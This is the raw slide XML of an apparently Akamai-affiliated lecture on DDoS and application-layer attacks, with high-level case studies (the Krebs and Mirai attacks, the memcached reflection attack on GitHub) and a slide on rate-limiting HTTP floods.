                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> FORWARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" baseline="34000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>TM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="New_Akamai_Logo_RGB.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="10479" t="21844" r="9471" b="17195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12633447" y="381939"/>
            <a:ext cx="1470562" cy="6302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6" r:id="rId4"/>
    <p:sldLayoutId id="2147483681" r:id="rId5"/>
    <p:sldLayoutId id="2147483682" r:id="rId6"/>
    <p:sldLayoutId id="2147483683" r:id="rId7"/>
    <p:sldLayoutId id="2147483686" r:id="rId8"/>
    <p:sldLayoutId id="2147483688" r:id="rId9"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3400">
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="653044" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="1306090" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1959135" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2612181" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:body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29"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4pPr>
      <a:lvl5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p:bodyStyle>
    <p:other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ak.xyz.com/logo.pdf?id=832164328"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iff"/><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104326"/>
            <a:ext cx="11013186" cy="1609213"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDOS Attacks and</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application-Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400050" y="3346825"/>
            <a:ext cx="14344650" cy="1486102"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Bruce Maggs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Duke University and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Emerald Innovations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412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Krebs Blog KrebsOnSecurity.com Comes Under Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3644990"/>
            <a:ext cx="13167360" cy="3706406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Krebs had recently reported on a web site called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> which purportedly offered to conduct cyberattacks for a fee.  After the report two Israeli men were arrested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Prolexic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> had been hosting KrebsOnSecurity.com pro-bono, until September 22, at which point it went down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Google took over on September 26.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6887" t="67639" r="49616" b="11194"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="851337" y="1277008"/>
            <a:ext cx="4855780" cy="2096814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6075806" y="1221491"/>
            <a:ext cx="7823074" cy="1692771"/>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According to Krebs, the attackers used malware called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BotNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> of Internet of Things (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) devices by scanning for factory-default passwords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334079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Passwords Hardcoded into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BotNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24894" t="9915" r="25383" b="24957"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072729" y="1151466"/>
            <a:ext cx="9093201" cy="6451600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9635067" y="3674533"/>
            <a:ext cx="50800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11420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55D5-B5AD-4B2B-A16F-792DC328A8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reflection attack on GitHub February 28, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B508E303-2114-4B86-99B5-443C84A00997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642620" y="1330642"/>
            <a:ext cx="13167360" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Packets with spoofed source address were sent to (50,000) open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>memcached</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>A 203-byte request packet can result in a 103MB response!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Filtered all traffic from UDP source port 11211.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E1CE8A-806B-49F9-BE5F-03EA5106E491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6944" t="42894" r="18750" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3962400"/>
            <a:ext cx="10871200" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3888049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Application Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="11993880" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker takes advantage of flaws in application implementations and hopes to steal, modify, or delete data, or otherwise compromise the server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56888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31" descr="gray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35" y="3823293"/>
            <a:ext cx="2480776" cy="20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6" descr="Akamai_Server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4595599" y="2917019"/>
            <a:ext cx="8816968" cy="4247758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728664" y="319090"/>
            <a:ext cx="12161315" cy="624340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defeating HTTP flooding attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>– Rate Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731522" y="1219194"/>
            <a:ext cx="13166725" cy="1185340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514254" indent="-514254">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Count the number of Forward Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514254" indent="-514254">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Block any IP address with excessive forward requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Right Arrow 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9488099" y="4209604"/>
            <a:ext cx="2669427" cy="199898"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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2" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682534" y="4388353"/>
            <a:ext cx="1745819"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Client Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Right Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1938443" y="4644676"/>
            <a:ext cx="2645907" cy="211656"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600"/>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5" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439426" y="3762226"/>
            <a:ext cx="1775496"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Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Left Arrow 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1867885" y="5514816"/>
            <a:ext cx="2728226" cy="188140"/>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3" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429231" y="579762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Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37" descr="Akamai_Server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5212504" y="2984746"/>
            <a:ext cx="691" cy="444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072974" y="2965635"/>
            <a:ext cx="2085629"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Customer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8639376" y="2861550"/>
            <a:ext cx="2453267"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Akamai</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Edge Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 40" descr="Hacker.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11923587" y="4411492"/>
            <a:ext cx="1880282" cy="1045518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262799" y="4460745"/>
            <a:ext cx="697593" cy="1015644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91423" tIns="45711" rIns="91423" bIns="45711" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Left Arrow 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
